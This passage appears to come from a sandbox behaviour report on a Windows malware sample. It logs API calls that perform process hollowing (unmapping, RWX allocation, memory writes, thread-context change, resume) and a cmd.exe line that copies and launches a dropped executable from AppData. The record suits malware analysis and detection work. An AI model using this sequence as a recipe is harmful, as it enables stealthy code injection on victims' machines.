[209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, 
[228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, 
[409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0097.697] ReadProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x7ffd8008, lpBuffer=0x12fb3c, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12fb3c*, lpNumberOfBytesRead=0x0) returned 1 [0097.697] NtUnmapViewOfSection (ProcessHandle=0x4c, BaseAddress=0x400000) returned 0x0 [0097.697] VirtualAllocEx (hProcess=0x4c, lpAddress=0x400000, dwSize=0x11d000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0097.697] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x400000, lpBuffer=0x154758*, nSize=0x1000, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x154758*, lpNumberOfBytesWritten=0x0) returned 1 [0097.698] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x401000, lpBuffer=0x154b58, nSize=0x0, lpNumberOfBytesWritten=0x0 | out: lpNumberOfBytesWritten=0x0) returned 0 [0097.698] WriteProcessMemory (in: hProcess=0x4c, 
lpBaseAddress=0x4c7000, lpBuffer=0x154b58*, nSize=0x54600, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x154b58*, lpNumberOfBytesWritten=0x0) returned 1 [0097.706] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x51c000, lpBuffer=0x1a9158*, nSize=0x800, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x1a9158*, lpNumberOfBytesWritten=0x0) returned 1 [0097.707] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x7ffd8008, lpBuffer=0x15488c*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x15488c*, lpNumberOfBytesWritten=0x0) returned 1 [0097.707] SetThreadContext (hThread=0x48, lpContext=0x3a0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffd8000, Edx=0x0, Ecx=0x0, Eax=0x51b2d0, Ebp=0x0, Eip=0x77277098, SegCs=0x1b, EFlags=0x200, Esp=0x12fff0, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, 
[8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, 
[198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, 
[379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0097.707] ResumeThread (hThread=0x48) returned 0x1 [0097.707] CloseHandle (hObject=0x48) returned 1 [0097.707] CloseHandle (hObject=0x4c) returned 1 [0097.707] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.708] GetModuleHandleW (lpModuleName="mscoree.dll") returned 0x0 [0097.708] ExitProcess (uExitCode=0x0) Process: id = "16" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16840" os_pid = "0xb68" os_integrity_level = "0x3000" 
os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\LSfkRHur.exe\" 2" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1081 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1082 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1083 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1084 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 1085 start_va = 0x4a0f0000 end_va = 0x4a13bfff entry_point = 0x4a0f0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 1086 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 
1087 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1088 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1089 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 1090 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1409 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1410 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1411 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1412 start_va = 0x130000 end_va = 0x13ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 1413 start_va = 0x4c0000 end_va = 0x5bffff entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 1414 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 1415 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1416 
start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1417 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1418 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1419 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1420 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1421 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1422 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1423 start_va = 0x140000 end_va = 0x207fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 1424 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1425 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" 
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1426 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 1427 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 1428 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 1429 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 1430 start_va = 0x310000 end_va = 0x410fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 1431 start_va = 0x5c0000 end_va = 0x11bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 1432 start_va = 0x11c0000 end_va = 0x1322fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011c0000" filename = "" Region: id = 1475 start_va = 0x1330000 end_va = 0x15fefff entry_point = 0x1330000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 18 os_tid = 0xb6c [0098.487] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x30f7d4 | out: lpSystemTimeAsFileTime=0x30f7d4*(dwLowDateTime=0x78b518e0, dwHighDateTime=0x1d440a9)) [0098.487] GetCurrentProcessId () returned 0xb68 [0098.487] GetCurrentThreadId () returned 0xb6c [0098.487] GetTickCount () returned 0x2384e [0098.487] QueryPerformanceCounter (in: lpPerformanceCount=0x30f7cc | out: lpPerformanceCount=0x30f7cc*=15527602188) returned 1 [0098.488] GetModuleHandleA (lpModuleName=0x0) returned 0x4a0f0000 [0098.488] __set_app_type (_Type=0x1) 
[0098.488] __p__fmode () returned 0x76b331f4 [0098.488] __p__commode () returned 0x76b331fc [0098.488] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a1121a6) returned 0x0 [0098.488] __getmainargs (in: _Argc=0x4a114238, _Argv=0x4a114240, _Env=0x4a11423c, _DoWildCard=0, _StartInfo=0x4a114140 | out: _Argc=0x4a114238, _Argv=0x4a114240, _Env=0x4a11423c) returned 0 [0098.488] GetCurrentThreadId () returned 0xb6c [0098.488] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb6c) returned 0x38 [0098.488] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0098.488] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0098.488] SetThreadUILanguage (LangId=0x0) returned 0x409 [0098.488] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0098.488] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x30f764 | out: phkResult=0x30f764*=0x0) returned 0x2 [0098.489] VirtualQuery (in: lpAddress=0x30f79b, lpBuffer=0x30f734, dwLength=0x1c | out: lpBuffer=0x30f734*(BaseAddress=0x30f000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0098.489] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x30f734, dwLength=0x1c | out: lpBuffer=0x30f734*(BaseAddress=0x210000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0098.489] VirtualQuery (in: lpAddress=0x211000, lpBuffer=0x30f734, dwLength=0x1c | out: lpBuffer=0x30f734*(BaseAddress=0x211000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0098.489] VirtualQuery (in: lpAddress=0x213000, lpBuffer=0x30f734, dwLength=0x1c | out: lpBuffer=0x30f734*(BaseAddress=0x213000, 
AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0098.489] VirtualQuery (in: lpAddress=0x310000, lpBuffer=0x30f734, dwLength=0x1c | out: lpBuffer=0x30f734*(BaseAddress=0x310000, AllocationBase=0x310000, AllocationProtect=0x2, RegionSize=0x101000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0098.489] GetConsoleOutputCP () returned 0x1b5 [0098.489] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a114260 | out: lpCPInfo=0x4a114260) returned 1 [0098.489] SetConsoleCtrlHandler (HandlerRoutine=0x4a10e72a, Add=1) returned 1 [0098.489] _get_osfhandle (_FileHandle=1) returned 0x7 [0098.489] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0098.489] _get_osfhandle (_FileHandle=1) returned 0x7 [0098.489] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1141ac | out: lpMode=0x4a1141ac) returned 1 [0098.490] _get_osfhandle (_FileHandle=1) returned 0x7 [0098.490] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0098.490] _get_osfhandle (_FileHandle=0) returned 0x3 [0098.490] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1141b0 | out: lpMode=0x4a1141b0) returned 1 [0098.490] _get_osfhandle (_FileHandle=0) returned 0x3 [0098.490] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0098.490] GetEnvironmentStringsW () returned 0x4d03f8* [0098.490] FreeEnvironmentStringsW (penv=0x4d03f8) returned 1 [0098.491] GetEnvironmentStringsW () returned 0x4d03f8* [0098.491] FreeEnvironmentStringsW (penv=0x4d03f8) returned 1 [0098.491] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30e6d4 | out: phkResult=0x30e6d4*=0x40) returned 0x0 [0098.491] 